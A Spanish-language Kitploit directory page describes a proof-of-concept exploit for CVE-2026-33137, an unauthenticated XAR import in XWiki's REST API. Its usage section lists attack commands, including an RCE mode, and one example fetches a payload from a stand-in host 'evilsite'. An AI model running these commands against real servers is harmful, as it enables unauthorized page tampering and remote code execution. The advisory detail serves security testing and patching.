Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName} | Kitploit
Herramientas/GitHubGitHub/portbuster1337/cve-2026-33137
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33137

XWiki Platform - Importación XAR no autenticada vía REST /wikis/{wikiName}

Descripción

El endpoint de la API REST POST /wikis/{wikiName} en XWiki Platform ejecuta una importación de XAR (XWiki Archive) sin realizar ninguna verificación de autenticación o autorización. Un atacante no autenticado puede crear o actualizar documentos arbitrarios en el wiki objetivo enviando un archivo XAR manipulado.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 Autorización faltante
  • CVSS 4.0: 9.3 (Crítico) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • Publicado: 2026-05-20

Versiones Afectadas

EstadoVersiones
Vulnerable> 15.10.16, > 16.4.6, > 16.10.2
Corregido16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

Impacto

Un atacante no autenticado puede:

  • Crear páginas wiki arbitrarias con contenido arbitrario
  • Sobrescribir páginas wiki existentes
  • Potencialmente lograr RCE creando páginas con scripts maliciosos de Velocity/Groovy (si la creación de scripts está habilitada)

Detalles

El endpoint REST POST /xwiki/rest/wikis/{wikiName} acepta un archivo XAR en el cuerpo de la solicitud y lo importa directamente al wiki sin verificar si el solicitante tiene derechos ADMIN. La corrección (commit 4b7b95b) añade una verificación de autorización usando ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).

Uso del PoC

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

Modo RCE (--rce)

La bandera --rce importa páginas que contienen payloads de Groovy y Velocity que ejecutan la cadena de comando especificada. Automáticamente:

  1. Ejecuta una comprobación previa (detección de versión, estado de vulnerabilidad, prueba del endpoint XAR, accesibilidad de la ruta de activación)
  2. Importa páginas con el comando especificado por el usuario incrustado en macros {{groovy}} y {{velocity}}
  3. Intenta el renderizado vía API REST, interfaz web e inyección estilo SSTI
  4. Reporta qué rutas de activación son accesibles versus bloqueadas

Requisitos para un RCE exitoso:

  • El objetivo debe permitir la visualización de páginas como invitado (o credenciales proporcionadas vía -u / --password)
  • Los derechos de scripting/programación deben estar habilitados para el usuario que visualiza
  • Las rutas de activación no deben estar bloqueadas por redireccionamientos de autenticación

Cómo Funciona el Exploit

  1. Se construye un archivo XAR (ZIP) mínimo que contiene:
    • package.xml - descriptor del paquete
    • {Space}/{Page}.xml - XML del documento con contenido
  2. Los bytes XAR se envían vía POST al endpoint vulnerable
  3. Si es vulnerable, el documento se crea sin autenticación
  4. Opcionalmente verifica leyendo los metadatos del documento

Aviso Legal

Este PoC se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado de este exploit contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal. El autor no es responsable de ningún uso indebido o daño causado por este software.

Referencias

  • GitHub Security Advisory GHSA-qrvh-r3f2-9h4r
  • Commit 4b7b95b (fix)
  • JIRA XWIKI-23953
  • NVD Entry
Descargar herramienta